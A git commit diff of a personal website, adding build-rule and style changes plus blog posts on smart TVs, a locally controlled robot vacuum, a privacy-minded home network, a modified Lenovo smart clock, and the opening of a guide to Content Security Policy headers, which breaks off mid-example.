Updates everything
This commit is contained in:
parent
ea220efc38
commit
7cf34b3650
24 changed files with 1305 additions and 11 deletions
17
Makefile
17
Makefile
|
@ -65,6 +65,10 @@ public/%/index.html: content/%.md tmp/templates/taglist.html
|
|||
mkdir -p $(@D)
|
||||
pandoc --template=templates/blog.html -f markdown -t html5 -M comments $< > $@
|
||||
|
||||
public/startpage/index.html: templates/startpage.html
|
||||
mkdir -p $(@D)
|
||||
cp $< $@
|
||||
|
||||
public/blog/%/index.gmi: content/blog/*-%.md
|
||||
mkdir -p $(@D)
|
||||
echo -n "# " > $@
|
||||
|
@ -72,7 +76,14 @@ public/blog/%/index.gmi: content/blog/*-%.md
|
|||
echo "" >> $@
|
||||
md2gemini -f -l paragraph $< >> $@
|
||||
|
||||
public/card:
|
||||
public/%/index.gmi: content/%.md
|
||||
mkdir -p $(@D)
|
||||
echo -n "# " > $@
|
||||
grep 'title: ' $< | cut -d ' ' -f 2- >> $@
|
||||
echo "" >> $@
|
||||
md2gemini -f -l paragraph $< >> $@
|
||||
|
||||
public/card: content/card.curl
|
||||
content/card.curl > $@
|
||||
|
||||
###########
|
||||
|
@ -83,9 +94,9 @@ tags: $(foreach tag, $(ALLTAGS), public/tag/$(shell echo $(tag) | tr 'A-Z' 'a-z'
|
|||
|
||||
blogs: $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.html ) $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.gmi )
|
||||
|
||||
standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html )
|
||||
standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html public/$(page)/index.gmi ) public/startpage/index.html
|
||||
|
||||
all: tags blogs standalone public/index.html public/feed.rss public/card
|
||||
all: tags blogs standalone public/index.html public/index.gmi public/feed.rss public/card
|
||||
|
||||
push-blog:
|
||||
rsync -azvhP ./public/ generalPurpose:docker/jonathanh/public
|
||||
|
|
|
@ -107,6 +107,9 @@ main{
|
|||
max-width: 95%;
|
||||
@media (min-width: 50em){
|
||||
max-width: 70%;
|
||||
&.wide{
|
||||
max-width: 95%;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -132,16 +135,34 @@ li{
|
|||
// overflow: auto;
|
||||
//}
|
||||
|
||||
.col-container{
|
||||
display: flex;
|
||||
flex-direction: row;
|
||||
flex-wrap: wrap;
|
||||
h1{
|
||||
width: 100%;
|
||||
}
|
||||
}
|
||||
|
||||
article{
|
||||
background-color: @gb-dm-bg1;
|
||||
margin: 1em;
|
||||
padding: 1em;
|
||||
border-radius: 1em;
|
||||
width: 100%;
|
||||
&.col{
|
||||
@media (min-width: 50em){
|
||||
width: 25%;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
footer{
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
@media (min-width: 50em){
|
||||
flex-direction: row;
|
||||
}
|
||||
justify-content: space-between;
|
||||
background-color: @gb-dm-bg3;
|
||||
padding: 0.5em;
|
||||
|
|
BIN
assets/lenovo-clock/microphone-board.jpg
Normal file
BIN
assets/lenovo-clock/microphone-board.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 122 KiB |
BIN
assets/lenovo-clock/screen-screws.jpg
Normal file
BIN
assets/lenovo-clock/screen-screws.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 67 KiB |
BIN
assets/lenovo-clock/screenshot.png
Normal file
BIN
assets/lenovo-clock/screenshot.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 20 KiB |
BIN
assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg
Normal file
BIN
assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 112 KiB |
BIN
assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg
Normal file
BIN
assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 86 KiB |
116
content/blog/017-why-cant-i-buy-a-dumb-tv.md
Normal file
116
content/blog/017-why-cant-i-buy-a-dumb-tv.md
Normal file
|
@ -0,0 +1,116 @@
|
|||
---
|
||||
title: Why can't I buy a dumb TV?
|
||||
date: 2022-12-31
|
||||
tags:
|
||||
- Privacy
|
||||
description: Dumb TVs don't appear to be a thing anymore. I wonder why?
|
||||
---
|
||||
|
||||
Our old TV is showing it's age a bit. It's an old Samsung. About 30" and 1080p.
|
||||
It works fine, but certainly isn't what you'd call modern. I think it dates from
|
||||
around 2010.
|
||||
|
||||
I thought I'd look and see how much it would cost to replace it -- allowing me to
|
||||
use it as a monitor. I spend the majority of my time in a terminal, I don't game
|
||||
and as such 4k, high refresh rate, wide screen monitors are of little interest
|
||||
to me. What is of interest to me is how many terminal windows I can tile and
|
||||
still use.
|
||||
|
||||
Anyway, I went to various sites and navigated to TVs. What I found surprised me
|
||||
a little: no dumb TVs. None at all. There were smart, 4k 55" TVs for under £400,
|
||||
but nothing without "smart features".
|
||||
|
||||
Most people assume that if I don't like something, it's because of privacy
|
||||
concerns or similar. While this is partly true for TVs, it's not my main
|
||||
dislike.
|
||||
|
||||
Smart TVs need to be maintained by the manufacturer when it is in their interest
|
||||
not to do so. Think about software updates. Is Samsung / LG / Sony / Philips going to
|
||||
be putting updates out for your TV in 10 or 15 years? If you think they might,
|
||||
take a look at how phones have gone. I'll use Samsung as an example: they offer
|
||||
3 years worth of feature updates and 4 years worth of security updates -- that is
|
||||
for their flagships. Lower end phones won't even get that. This means that after
|
||||
4 years, your Samsung flagship phone will not be patched for security issues.
|
||||
|
||||
Why would they do any different for TVs? Many smart TVs even run Android -- a
|
||||
variation on the system used on most smartphones.
|
||||
|
||||
That just relates to the manufacturer maintaining the device. Let alone the apps
|
||||
who can also [decide to stop supporting the TV](https://9to5google.com/2019/07/26/sony-tv-amazon-prime-video-september/).
|
||||
|
||||
It is bad enough spending hundreds (or thousands) of pounds on a phone every few
|
||||
years, I don't want to do the same for a TV.
|
||||
|
||||
"What about apps?", you might ask. This is a non issue. I can buy a 4k fire
|
||||
stick for less than £50. That is without offers. I've seen them sub-£30 on prime
|
||||
day. If that only lasts 3 years, I can swap that for a new one at the time,
|
||||
rather than swapping out my whole TV. I don't love the idea of replacing a set
|
||||
top box every few years, but I like that idea far more than replacing a whole
|
||||
TV.
|
||||
|
||||
Modern versions of HDMI will happily support your HDR, single remote and
|
||||
surround sound needs.
|
||||
|
||||
So, planned obsolescence is one reason, but I don't think it is the whole story.
|
||||
|
||||
I'm sure it won't come as a surprise to anyone reading this blog that data
|
||||
collection is a huge business these days. Targeting advertising allows companies
|
||||
to charge exuberant prices for well placed ads. The amount they can charge
|
||||
correlates nicely with the amount of data they can collect. It is no coincidence
|
||||
that the largest advertising companies (Google and ~~Facebook~~ Meta) are also
|
||||
two of the worst offenders for hoarding information.
|
||||
|
||||
TV manufacturers realised that they can make more money selling adverts than
|
||||
they can selling TVs. The more TVs they sell, the more they can charge for
|
||||
advertising. This is not just me and my tin foil hat. Vizio went public a year
|
||||
or so ago and, as a result, had to publish their financials. They made over
|
||||
[twice as much money selling ads as they made from TV sales](https://www.theverge.com/2021/11/10/22773073/vizio-acr-advertising-inscape-data-privacy-q3-2021).
|
||||
|
||||
This isn't the post to go into why I think it is important to protect your data.
|
||||
If you're reading my blog, you probably already have some idea. However, it
|
||||
seems that just as most of our phones, smart speakers and watches spy on us, our
|
||||
TVs are trying to do the same. Maybe you don't care if big companies know what
|
||||
you're watching. That is your decision, but it is a decision you should make --
|
||||
not one that you should be compelled into.
|
||||
|
||||
It seems clear to me that planned obsolescence isn't the only factor at play
|
||||
here. Sure, they want to sell you a TV every few years, but they also want to
|
||||
harvest as much data as possible in order to sell ads. I don't want this.
|
||||
|
||||
The question then becomes, what can we do about it? Unfortunately, I haven't
|
||||
found a good answer to this but here are some thoughts.
|
||||
|
||||
The first, and perhaps most obvious answer, is to buy a smart TV and just not
|
||||
connect it to the network. With this you get the advantage of (comparably) cheap
|
||||
units, and don't have the risk of data harvesting. A slight variation on this
|
||||
might be isolating the TV or blocking access via a firewall rule. This doesn't,
|
||||
however, mitigate the issue of security updates. Additionally, I'm told that
|
||||
many TVs will either not work at all, or continuously prompt you to connect them
|
||||
to the internet. I recently tried to use a Fire TV stick on a network without
|
||||
internet connectivity, in order to watch content stored on a local server with
|
||||
Jellyfin. The process was a long way from ideal. The home screen (where you
|
||||
would normally select the app such as Jellyfin) was replaced entirely with a
|
||||
network error and a prompt to go to network settings. Even apps that don't
|
||||
require an internet connection were unavailable.
|
||||
|
||||
It was possible to launch Jellyfin by going `Settings` -> `Applications` ->
|
||||
`Manage Installed Applications` -> `Jellyfin` -> `Launch Application`, but that
|
||||
is not a process I want to make every time I turn on the TV, and certainly not a
|
||||
solution that would get wife-approval. I have no idea if I would have similar
|
||||
issues with other devices, and buying a smart TV to test that is not
|
||||
particularly palatable.
|
||||
|
||||
Another option might be using a non-tv monitor as a TV. You can buy large
|
||||
computer monitors or displays meant for digital signage. Computer monitors of
|
||||
this size [are
|
||||
expensive](https://www.amazon.co.uk/Philips-558M1RY-Monitor-Ambiglow-FreeSync/dp/B086X4J9KG/ref=sr_1_3?keywords=65+inch+monitor+4k&qid=1672490924&sprefix=65+inch+monitor%2Caps%2C292&sr=8-3).
|
||||
Digital signage signs are also expensive, but do tend to come with the advantage
|
||||
that they are designed to be on all the time. Although I couldn't find much in
|
||||
the way of data, I suspect this would mean they would last longer. However,
|
||||
again, they are a lot more expensive than a consumer-grade smart TV.
|
||||
|
||||
My plan is to do some more research and try and find a smart tv that can be used
|
||||
without constant nags when not connected to the internet. If any of you know of
|
||||
such a device, or have any other ideas, let me know in the comments below.
|
||||
|
||||
|
71
content/blog/018-i-got-a-robot-vacuum.md
Normal file
71
content/blog/018-i-got-a-robot-vacuum.md
Normal file
|
@ -0,0 +1,71 @@
|
|||
---
|
||||
title: I Got a Robot Vacuum
|
||||
date: 2022-12-31
|
||||
tags:
|
||||
- Privacy
|
||||
- Home Assistant
|
||||
description: I recently bought a Robot vacuum. I have been amazed how good it is.
|
||||
---
|
||||
|
||||
So, you have probably seen or heard about robot vacuums. I had, although
|
||||
honestly thought they were a bit of a gimmick. However, a few people I know have
|
||||
them and sung their praises so I thought I'd see what the fuss was about.
|
||||
|
||||
I did some research and settled on the [Dreame L10 Pro](https://amzn.to/3GacxLz)
|
||||
([Non-Associates
|
||||
link](https://www.amazon.co.uk/Dreame-Dual-Line-Navigation-Multi-Level-Compatible/dp/B09YQ3VF3J/?th=1)).
|
||||
This was in no small part because it is known to work with
|
||||
[Valetudo](https://valetudo.cloud/) which allows for fully local control of the
|
||||
robot. As well as a very usable web interface, it also provides MQTT control
|
||||
which I use for [Home Assistant](/tag/home_assistant/) control.
|
||||
|
||||
It is fair to say that my expectations have been shattered by this device. I
|
||||
expected it to do a reasonable job, but that I would probably have to do a
|
||||
"proper" hoover once a week or so. That has not been the case. I have not had to
|
||||
manually hoover the floors at all since setting it up. I have been especially
|
||||
surprised by this as we have a dog who malts.
|
||||
|
||||
I have the vacuum set to vacuum our daytime living areas (lounge, kitchen, hall,
|
||||
study) every morning at 1am. I did not expect the quality of life improvement
|
||||
that we got from waking up every morning to a vacuumed house. Our bedroom is
|
||||
then vacuumed during the day while we work. Apart from emptying the vacuum's
|
||||
dustbin, this is entirely automatic.
|
||||
|
||||
The vacuum I have has a detachable cloth and water tank that it can drag behind
|
||||
it and keep wet. I mostly got the device for its vacuum capabilities. However,
|
||||
the addition of the mop is nice. This, too, exceeded my expectations; although
|
||||
not to the same extent as the vacuum. It is nice to have, but I wouldn't buy
|
||||
this particular robot for its mopping capabilities. We tend to attach this mop
|
||||
and manually instruct the vacuum to mop various rooms when we go out.
|
||||
|
||||
## Any Cons?
|
||||
|
||||
Although this device has been an overwhelming positive in our life, it may not
|
||||
be for everyone.
|
||||
|
||||
We have hard floors throughout our flat. This obviously makes vacuuming and
|
||||
mopping easier for the robot. We do have a thick rug which it can struggle with
|
||||
a little. However, I have taken the robot to our parents' houses who have carpet
|
||||
and it has tackled even quite thick carpets without issue. If you have a lot of
|
||||
very thick rugs, you may want to do a bit more research into robots that can
|
||||
deal with them.
|
||||
|
||||
Also, the dustbin in the vacuum is quite small. I tend to empty it every other
|
||||
day. Paying more can get you features such as auto-emptying dustbins which the
|
||||
robot I got doesn't have.
|
||||
|
||||
We live in a flat, so we don't have stairs to contend with. We are due to move
|
||||
very soon into a house. My long term plan is to buy a second robot, in order to
|
||||
have one up stairs and one downstairs. This (obviously) makes a fully automated
|
||||
vacuuming setup significantly more expensive. However, the fact that I am
|
||||
planning this hopefully demonstrates how happy I am with this vacuum.
|
||||
|
||||
## Home Assistant
|
||||
|
||||
As mentioned, Valetudo allows me to control my robot entirely locally. My home
|
||||
automation platform of choice is Home Assistant which is [supported by
|
||||
Valetudo](https://valetudo.cloud/pages/integrations/home-assistant-integration.html).
|
||||
|
||||
With my smart light switches, it allows me to do things like push and hold the
|
||||
light switch in order to instruct the vacuum to come and hoover the room I'm in.
|
||||
It can also stop the vacuum from vacuuming every day while we are on holiday.
|
162
content/blog/019-my-new-home-network.md
Normal file
162
content/blog/019-my-new-home-network.md
Normal file
|
@ -0,0 +1,162 @@
|
|||
---
|
||||
title: My New Home - Network
|
||||
date: 2023-02-08
|
||||
tags:
|
||||
- Privacy
|
||||
- My New Home
|
||||
description: >
|
||||
I recently bought a new House. In this post, I discuss my network setup as
|
||||
part of a series of posts about the setup.
|
||||
---
|
||||
|
||||
So, we have finally moved into our new home. The buying process took far too
|
||||
long, I am sick to death of dealing with solicitors, but we are now in. I hope
|
||||
this will become a series of blog posts in which I detail the setup process.
|
||||
This particular post will be the network.
|
||||
|
||||
My initial intention had been to buy some land and build a house. However, the
|
||||
process of doing so in the UK was ... annoying, so instead we went for a new
|
||||
build. We found the property early enough in the build process that we were able
|
||||
to make various requests. One of which was for the electrician to run Cat-6
|
||||
ethernet cable throughout the house before the walls were plastered. The cables
|
||||
all run into our under-stairs cupboard which I managed to convince my wife to
|
||||
give me as a server room.
|
||||
|
||||
The majority of our rooms have 2 ethernet sockets in opposite corners. Our
|
||||
lounge has 4, one in each corner. Our hall and landing both have celling mounted
|
||||
ports for access points. I think this is probably more than we need, but at the
|
||||
time we didn't know how we'd lay the rooms out, so we put in more than we
|
||||
thought we'd need. I think this was a good choice. Running ethernet is much
|
||||
easier when you don't have plaster to contend with. And they are just sockets on
|
||||
the walls -- they are no uglier than mains, telephone or coax sockets.
|
||||
|
||||
## Network Gear
|
||||
|
||||
In terms of the network gear, I decided to take the plunge and try TP-Links
|
||||
Omada line. I think it is fair to say that in the pro-sumer arena, Ubiquity are
|
||||
the most popular. However, they are also expensive. I watched a lot of YouTube
|
||||
and decided that TP Link's product catered for my needs.
|
||||
|
||||
I bought:
|
||||
|
||||
* [A Router / firewall](https://amzn.to/3HwPACO) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08SWR1K56/))
|
||||
* [A Switch](https://amzn.to/3I1rB07) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08W4PM24H/))
|
||||
* [An Access Point](https://amzn.to/3RCFkxw) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B09ZF7HPFB/))
|
||||
|
||||
I won't go into too much detail on the individual devices I got as copying me is
|
||||
a pretty bad idea. You want to make the decision based on the size of your
|
||||
network, the speeds you need and the sorts of devices you want to attach.
|
||||
|
||||
## Network Configuration
|
||||
|
||||
I run the TP Link Omada Controller in a Docker container on my home server. I
|
||||
have had no issues with it at all so far.
|
||||
|
||||
In terms of the software itself, I would say that it's not quite on a par with
|
||||
Ubiquity's product, however, it is more than sufficient for my needs and I would
|
||||
think more than sufficient for most home users and small / medium businesses.
|
||||
|
||||
The only area I found it to be a little lacking was the firewall configuration.
|
||||
However, before I explain that, it would be helpful for me to explain the VLANs
|
||||
I have on my network. In case you don't know, a VLAN is a virtual network. It is
|
||||
useful for categorising and segregating devices. I have seen many examples
|
||||
across the internet of people who setup tens of VLANs for their home network.
|
||||
However, I think any security gains you may get from that are outweighed by the
|
||||
added complexity maintaining it. I have opted for two VLANs.
|
||||
|
||||
My first VLAN is for trusted devices. Trusted devices are my computers, my
|
||||
wife's computers, our phones and my server. These are able to communicate
|
||||
with each other and the internet.
|
||||
|
||||
My second VLAN is for smart devices. These are devices that have no business
|
||||
talking to each other or the internet. The only device they can communicate with
|
||||
is my server running Home Assistant, an NTP server and a DNS server.
|
||||
|
||||
This can all be achieved easily with the Omada software. Where it is lacking is
|
||||
in its inability to set up stateful firewall rules. I would like to configure
|
||||
the firewall so that devices on my trusted network can communicate with devices
|
||||
on the smart VLAN, and the smart devices should be able to reply. Meaning, from
|
||||
my laptop, I cannot SSH into [my vacuum](/blog/i-got-a-robot-vacuum/) because
|
||||
that requires 2 way communication. There is talk [on
|
||||
Reddit](https://libreddit.kavin.rocks/r/HomeNetworking/comments/mrxsbg/tplink_omada_switch_acls_arent_stateful/)
|
||||
that future firmware may support this, but at the moment it doesn't. I have got
|
||||
around this by using my server as a jump box to SSH from as smart devices are
|
||||
able to connect to this, although I'd prefer a stateful firewall solution.
|
||||
|
||||
I am also not able to force all DNS requests to my DNS server. On some router /
|
||||
firewall solutions, you can force all outbound traffic on port 53 (DNS) to a
|
||||
particular device. I have to rely on devices honouring the server specified via
|
||||
DHCP. However, they seem to be doing this. They are unable to communicate with
|
||||
any other servers so even if they are only honouring my choices because they
|
||||
have no choice, I don't really care.
|
||||
|
||||
## NTP
|
||||
|
||||
One of the issues I overlooked when planning my network setup was that of the
|
||||
Network Time Protocol (NTP). I have Chrony running on my server, but many
|
||||
devices don't allow you to specify an NTP server. Instead, they just silently
|
||||
fail, and leave you scratching your head whilst trying to correlate times in log
|
||||
files. A particularly annoying case of this had a device default to a date in
|
||||
January 2022. Whilst debugging an issue, it was January 2023 and I completely
|
||||
missed the fact that it was a year out for far too long.
|
||||
|
||||
It should be possible to configure an NTP server via DHCP. However, the Omada
|
||||
software doesn't [appear to support
|
||||
it](https://community.tp-link.com/en/business/forum/topic/256680). Eventually, I
|
||||
might allow my Pi Hole to manage IP assignment which would allow me to configure
|
||||
the appropriate DHCP options, although that would still be reliant on devices
|
||||
obeying it.
|
||||
|
||||
For now, I have pointed the domains I saw being used at my server, which appears
|
||||
to have worked.
|
||||
|
||||
## Network Connection
|
||||
|
||||
Another issue I came across is that some mobile apps for self hosted programs
|
||||
don't work without an internet connection. I [raised an
|
||||
issue](https://github.com/advplyr/audiobookshelf-app/issues/566) for
|
||||
Audiobookshelf. The owner responded quickly and after a few screenshots
|
||||
acknowledged the bug. This is not supposed to be a knock on the app -- I have
|
||||
been hugely impressed by the speed of responses I've had from the team who work
|
||||
on it. It is instead supposed to highlight the fact that many tools are not
|
||||
tested against the sort of non-standard setup I have here. As a result, I am
|
||||
going to run into issues that I wasn't expecting.
|
||||
|
||||
In the case of Audiobookshelf, it looks like one of its libraries checks for
|
||||
internet connectivity rather than network connectivity. After checking my
|
||||
pihole's logs, it turns out that Android devices make regular (unencrypted)
|
||||
requests to <http://connectivitycheck.gstatic.com>. This is used to identify
|
||||
captive portals as well as verify internet connectivity. Fortunately for me,
|
||||
being unencrypted, I can host a simple webserver and point that domain at it on
|
||||
my network. So that's what I did. The relevant NGINX config is below:
|
||||
|
||||
```nginx
|
||||
server {
|
||||
listen 80;
|
||||
listen [::]:80;
|
||||
|
||||
server_name connectivitycheck.gstatic.com;
|
||||
|
||||
location / {
|
||||
return 204;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
After this, the app started working as expected.
|
||||
|
||||
## WPS
|
||||
|
||||
WPS is a method of connecting to a network without having to enter a password.
|
||||
It generally involves pushing a button on your access point and a button on your
|
||||
phone / device then "magically" the device is on your network. This method of
|
||||
connection has been shown to have several security weaknesses. Many modern
|
||||
solutions, including Omada and Ubiquiti have stopped providing this as an
|
||||
option.
|
||||
|
||||
I approve of this decision, it is something I would have disabled if it had been
|
||||
present. However, my printer has no other way of connecting to the network. No
|
||||
ethernet and no way to enter a password. I think I'll probably have to dig out
|
||||
an old router that does support WPS and hope that after connecting, the printer
|
||||
will have a web interface that allows me to change the network configuration. If
|
||||
not, I may have to just plug a small SBC into it and run a cups server on that.
|
209
content/blog/020-my-new-home-alarm-clock.md
Normal file
209
content/blog/020-my-new-home-alarm-clock.md
Normal file
|
@ -0,0 +1,209 @@
|
|||
---
|
||||
title: My New Home - Alarm Clock
|
||||
date: 2023-02-26
|
||||
tags:
|
||||
- Privacy
|
||||
- My New Home
|
||||
- Home Assistant
|
||||
description: >
|
||||
Part 2 of my new home setup. I discuss a Lenovo clock I got.
|
||||
---
|
||||
|
||||
I recently picked up a [Lenovo Clock
|
||||
2](https://www.lenovo.com/gb/en/p/smart-devices/smart-home/smart-home-series/lenovo-smart-clock-2/wmd00000485)
|
||||
on offer. I got it for around £25. I knew it ran Android and thought
|
||||
that for that price, it was worth picking one up to mess with.
|
||||
|
||||
After a couple of searches, I found a guide to installing other android apps on
|
||||
it.
|
||||
|
||||
<https://forum.xda-developers.com/t/guide-installing-android-apps-on-the-lenovo-smart-clock-2.4393271/>
|
||||
|
||||
Once I'd installed a custom launcher, I was able to get into the android
|
||||
settings and start disabling apps. I disabled the vast majority of them although
|
||||
I was unable to disable the Google Assistant app. At the time of writing, there
|
||||
doesn't appear to be a reliable root method for the device. There is also no USB
|
||||
interface so even an adb shell was unachievable.
|
||||
|
||||
## Dealing with the microphones
|
||||
|
||||
For me to have a device like this plugged in, in my house, I want to be
|
||||
absolutely certain that it isn't sending any data back to its Google mothership.
|
||||
|
||||
The device has a toggle on the back that switches the microphone off. This is a
|
||||
software toggle. This has 2 issues. Firstly, it could conceivably be overwritten
|
||||
in software. Second, it puts an icon on the screen to tell you that it's muted.
|
||||
This takes up a significant part of an already small screen. So, I took the
|
||||
device apart to see if the microphones were removable.
|
||||
|
||||
I should probably make the point here that the following procedure will void any
|
||||
warranties you may have on the device. Also, this is not advice, I am not
|
||||
responsible if you break it, or hurt yourself or anything else.
|
||||
|
||||
Disassembly was surprisingly easy. After unsticking the non-slip
|
||||
ring on the bottom, there were four screws to undo -- one in each corner. After
|
||||
doing this, the bottom of the device can be prized off. There are a few plastic
|
||||
clips and a ribbon cable to be aware of, but if you have ever disasembed
|
||||
anything before, it should be quite easy.
|
||||
|
||||

|
||||
|
||||
This then exposes a couple of additional screws which hold the screen in place,
|
||||
highlighted above. The screen can then be removed, exposing a circuit board
|
||||
containing the microphones and the ambient light sensor.
|
||||
|
||||

|
||||
|
||||
This can be removed. It is friction fit and there is another ribbon cable.
|
||||
Remove the ribbon cable and the microphones and sensor can be removed. Put
|
||||
everything back together and plug it in - there you go. You have a device that
|
||||
**cannot** listen to you.
|
||||
|
||||
This may be overkill, this device is going on a VLAN that doesn't have internet
|
||||
access so there should be no way for it to talk back anyway. However, defence in
|
||||
depth is the best option in my opinion. If I connect it to the wrong network or
|
||||
misconfigure my firewall, I don't want it sending any information back to
|
||||
anyone.
|
||||
|
||||
## Home Assistant Setup
|
||||
|
||||
Next step, for me, was to set it up as a Home Assistant screen. I was able to
|
||||
install [WallPanel](https://github.com/thecowan/wallpanel-android) which is a
|
||||
browser that can be controlled remotely via an HTTP API or MQTT. It is similar
|
||||
to the concept of [FullyKioskBrowser](https://www.fully-kiosk.com/). It is open
|
||||
source though and doesn't lock features behind a paywall. I've used
|
||||
FullyKioskBrowser before, and it is a very competent piece of software, but I
|
||||
felt like trying something new.
|
||||
|
||||
I created a simple dashboard in Home Assistant, and set the start URL for
|
||||
wallpanel to that dashboard. The screen is small, so you don't really want lots
|
||||
of information on there. I have a clock, an alarm clock toggle, a radio
|
||||
station selection (more on that later) and a few buttons.
|
||||
|
||||
The next part of the setup was [Browser
|
||||
Mod](https://github.com/thomasloven/hass-browser_mod). This allows you to
|
||||
control a browser window through Home Assistant, adding the ability to use it as
|
||||
a media player or hide the navigation elements that are usually present. This
|
||||
allowed me to play (local) audio on the clock. It also allows me to remove the
|
||||
sidebar and top bar on the device to reclaim a little screen space.
|
||||
|
||||
### Radio
|
||||
|
||||
One of the side effects of not allowing the clock to access the internet means
|
||||
it can't play internet radio (hopefully that isn't a surprise to anyone).
|
||||
However, I like to be woken up to the radio. It is probably possible to add some
|
||||
radio IP addresses to a whitelist. However, to make my life easier, I decided to
|
||||
proxy any radio stations through my home server, which does have internet
|
||||
access and the smart clock can communicate with.
|
||||
|
||||
For the most part this was pretty simple. I found stream URLs for a couple of
|
||||
radio stations. Here is the nginx configuration for Classic FM and Absolute
|
||||
Radio.
|
||||
|
||||
```nginx
|
||||
perl_set $unix_timestamp 'sub {
|
||||
time();
|
||||
}';
|
||||
|
||||
server {
|
||||
listen 443 ssl;
|
||||
listen [::]:443 ssl;
|
||||
|
||||
ssl_certificate /etc/nginx/certs/fullchain1.pem;
|
||||
ssl_certificate_key /etc/nginx/certs/privkey1.pem;
|
||||
|
||||
server_name radio.my.domain
|
||||
include /etc/nginx/conf.d/acl.inc;
|
||||
|
||||
location /classicfm {
|
||||
proxy_pass http://icecast.thisisdax.com/ClassicFMMP3;
|
||||
}
|
||||
|
||||
location /absolute {
|
||||
resolver 1.1.1.1;
|
||||
proxy_pass http://edge-bauerabsolute-05-gos2.sharp-stream.com/absoluteradiohigh.aac?aw_0_1st.skey=${unix_timestamp}&aw_0_1st.playerid=BMUK_RPi;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
I'm sure you can see how this can be extended for more stations. The only thing
|
||||
that may not be obvious is the `unix_timestamp` variable in the absolute radio
|
||||
url. I don't know why it is necessary, but for some reason it is, so I define a
|
||||
variable in the `perl_set` block at the top.
|
||||
|
||||
So, with this, I can run
|
||||
|
||||
```bash
|
||||
mpv https://radio.my.domain/classicfm
|
||||
```
|
||||
|
||||
And ClassicFM will play. With BrowserMod set up for the device, I can then run
|
||||
the service:
|
||||
|
||||
```yaml
|
||||
service: media_player.play_media
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
data:
|
||||
media_content_type: music
|
||||
media_content_id: "https://radio.my.domain/classicfm"
|
||||
```
|
||||
|
||||
I would like to be able to add these URLs to the media library, however I
|
||||
haven't yet found a way to do that. If anyone knows of a way, please let me
|
||||
know. However, for now I created a text helper with the following:
|
||||
|
||||
* Off
|
||||
* Absolute Radio
|
||||
* Classic FM
|
||||
|
||||
I then created an automation:
|
||||
|
||||
```yaml
|
||||
- alias: Clock Radio
|
||||
trigger:
|
||||
- platform: state
|
||||
entity_id:
|
||||
- input_select.bedroom_radio
|
||||
condition: []
|
||||
action:
|
||||
- if:
|
||||
- condition: state
|
||||
entity_id: input_select.radio
|
||||
state: Classic FM
|
||||
then:
|
||||
- service: media_player.play_media
|
||||
data:
|
||||
media_content_id: https://radio.hodgson.one/classicfm
|
||||
media_content_type: music
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
- if:
|
||||
- condition: state
|
||||
entity_id: input_select.radio
|
||||
state: Absolute Radio
|
||||
then:
|
||||
- service: media_player.play_media
|
||||
data:
|
||||
media_content_id: https://radio.hodgson.one/absolute
|
||||
media_content_type: music
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
- if:
|
||||
- condition: state
|
||||
entity_id: input_select.radio
|
||||
state: 'Off'
|
||||
then:
|
||||
- service: media_player.media_stop
|
||||
data: {}
|
||||
target:
|
||||
entity_id: media_player.alarm_clock
|
||||
mode: single
|
||||
```
|
||||
|
||||
The last step is an automation for my alarm clock. It simply sets the input
|
||||
select we set up to ClassicFM. This then plays on the speaker.
|
||||
|
||||
The result is below:
|
||||
|
||||

|
360
content/blog/021-csp.md
Normal file
360
content/blog/021-csp.md
Normal file
|
@ -0,0 +1,360 @@
|
|||
---
|
||||
title: Setting a good Content Security Policy
|
||||
date: 2024-08-22
|
||||
tags:
|
||||
- Security
|
||||
- Websites
|
||||
description: >
|
||||
Setting a good CSP can be hard. Here I go through what it is, and how to set
|
||||
it up well.
|
||||
---
|
||||
|
||||
The Content Security Policy (CSP) is a powerful security feature that helps
|
||||
protect your website from cross-site scripting (XSS) attacks and other types of
|
||||
code injection vulnerabilities. There are some directives that do other things,
|
||||
but the bulk of this blog post will cover using the `fetch-directives`, or the
|
||||
elements of the CSP that allow you to specify a allow-list of approved sources
|
||||
from which resources This helps prevent malicious code from being executed on
|
||||
your site.
|
||||
|
||||
To implement CSP, you need to set the Content-Security-Policy HTTP header on
|
||||
your web server. Here's an example of what a basic CSP header might look like:
|
||||
|
||||
```
|
||||
Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com
|
||||
```
|
||||
|
||||
Let's break down the different directives in this example:
|
||||
|
||||
- `default-src 'self'`: This sets the default source for all resource types to the same origin (i.e., your own website). This is a good baseline to start with.
|
||||
- `script-src 'self' https://example.com`: This specifies that scripts can only be loaded from your own site (`'self'`) and the `https://example.com` domain. This helps prevent the execution of any unauthorized scripts.
|
||||
|
||||
It is worth noting that default-src applies to all source types that haven't
|
||||
been explicitly specified. Any sources that are explicitly specified overwrite
|
||||
then default-src, they are not added to it.
|
||||
|
||||
Consider the following:
|
||||
|
||||
```
|
||||
Content-Security-Policy: default-src 'self'; script-src https://example.com
|
||||
```
|
||||
|
||||
This will not allow scripts to sourced from the current origin, despite `'self'`
|
||||
being in the `default-src` directive.
|
||||
|
||||
You can further customize the CSP header to suit your website's specific needs.
|
||||
For example, you might want to allow images to be loaded from a content delivery
|
||||
network (CDN), or allow fonts from a third-party font provider. Here's an
|
||||
example of a more comprehensive CSP header:
|
||||
|
||||
```
|
||||
